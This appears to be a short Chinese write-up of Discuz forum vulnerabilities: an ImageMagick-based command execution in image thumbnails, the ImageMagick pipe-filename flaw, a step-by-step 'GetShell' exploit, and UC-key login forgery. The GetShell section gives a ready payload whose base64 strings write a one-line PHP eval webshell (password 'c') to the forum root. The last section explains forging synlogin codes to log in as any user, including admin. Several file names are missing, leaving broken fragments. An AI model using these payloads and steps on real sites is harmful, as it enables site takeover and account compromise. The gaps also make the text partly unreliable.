2024年4月28日发(作者:)

0x00 网站快照劫持:DZ常见漏洞利用分析

0x01Discuz上传图片附件实现远程命令执行漏洞

漏洞产生过程:forum_中的$w,$h变量可控,末处理直接传入Thumb()函

数,经该函数传入Thumb_IM()函数,最终调用exec()导致远程命令执行漏洞。

通过分析可知:需要调用image_class模块调用图像预览功能,后台上传

设置为ImagicMagick库,默认为GD库渲染。前台登录发贴上传图片附件。

提示: 是常被利用的文件(论坛首页入口组件),论坛附件上传是个突破口。

0x02ImageMagick远程执行漏洞分析及利用

目前所有版本的Graphicsmagick和ImageMagick都支持打开文件,当文件名的第

一个字符为‘|’,则文件名会被传递给shell程序执行,导致(可能远程)代码执行。

提示:ImageMagick图片程序对文件名处理机制存在漏洞

0x03Discuz GetShell(获取权限)漏洞EXP

1.注册任意账户,登陆用户,发表blog日志(注意是日志)

2.添加图片,选择网络图片,地址

{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAg

QGV 2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}

3.访问日志,论坛根目录下生成,一句话密码c

由0x01、0x02与0x03可知论坛上传图片是被利用最常见的漏洞,管理员们要注意把

控。

0x04 Discuz获取UC key Getshell(获取权限)。

知道UC的appkey的情况下getshell,问题的根源在于api/

几乎所有版本都可以(在得到uc_key情况下)/api/里面有个synlogin方法

只要网上随便找个以前uckeygetshell的脚本加密一下这个

'time='.time().'&action=synlogin&uid=你

要登录的用户的id';得到code后直接访问域名/api/?code=你加密后的

code,就能登录了,admin

管理员也是可以登录的。

Discuz 的UCenter创始人密码可被爆破,访问登录路径/uc_server/实现

爆破修改文件默认路径,注意目录防护,修改UC key加强防范。